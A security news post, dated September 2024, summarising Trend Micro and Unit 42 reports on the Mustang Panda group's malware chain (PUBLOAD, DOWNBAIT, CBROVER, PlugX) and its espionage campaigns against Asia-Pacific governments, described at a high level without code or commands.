• Posted by: Eng. Donya Bino
• September 11, 2024

Mustang Panda Upgrades Malware Tools for Advanced Data Exfiltration Campaign

The threat actor known as Mustang Panda has refined its malware arsenal with new tools to enhance data exfiltration and deploy next-stage payloads, as reported by Trend Micro.

The cybersecurity firm, tracking this activity under the name Earth Preta, noted that the group has been "propagating PUBLOAD via a variant of the worm HIUPAN."

PUBLOAD is a well-known downloader malware that has been associated with Mustang Panda since early 2022. It has primarily been used in cyberattacks targeting government entities in the Asia-Pacific (APAC) region, often delivering the notorious PlugX malware.

"PUBLOAD was also used to introduce supplemental tools into the targets' environment, such as FDMTP, a secondary control tool, which performs similar tasks to PUBLOAD; and PTSOCKET, a tool used as an alternative exfiltration option," said security researchers Lenart Bermejo, Sunny Lu, and Ted Lee.

Trend Micro had previously documented Mustang Panda's use of removable drives for spreading HIUPAN, which Google-owned Mandiant tracks as MISTCLOAK. This activity has been observed since September 2021, linked to cyber espionage campaigns targeting nations like the Philippines.

PUBLOAD comes equipped with features that conduct reconnaissance on infected networks and harvest files, including documents like .doc, .docx, .xls, .xlsx, .pdf, .ppt, and .pptx. It also acts as a gateway for introducing new hacking tools such as FDMTP, a simple malware downloader based on TouchSocket over Duplex Message Transport Protocol (DMTP).

Captured information is compressed into an RAR archive and exfiltrated via FTP using cURL. Additionally, Mustang Panda deploys a custom program named PTSOCKET, which transfers files in multi-thread mode.

 

Advanced Malware Tactics

Trend Micro also highlighted a "fast-paced spear-phishing campaign" detected in June 2024, which distributed email messages containing a .url attachment. When launched, this attachment delivered a signed downloader known as DOWNBAIT.

The campaign targeted countries like Myanmar, the Philippines, Vietnam, Singapore, Cambodia, and Taiwan, as evident from the filenames and decoy documents used.

DOWNBAIT serves as a first-stage loader that retrieves and executes the PULLBAIT shellcode, which then downloads and runs the CBROVER backdoor. This implant supports file download, remote shell execution, and acts as a delivery vehicle for the PlugX remote access trojan (RAT). PlugX then deploys another custom file collector, FILESAC, to steal the victim’s data.

The report by Palo Alto Networks Unit 42 also revealed Mustang Panda’s use of Visual Studio Code's embedded reverse shell to gain initial access to target networks. This shows that the group continues to adjust its tactics, adopting new methods for cyber espionage.

"Earth Preta has shown significant advancements in their malware deployment and strategies, particularly in their campaigns targeting government entities," the researchers said. "The group has evolved their tactics, [...] leveraging multi-stage downloaders (from DOWNBAIT to PlugX) and possibly exploiting Microsoft's cloud services for data exfiltration."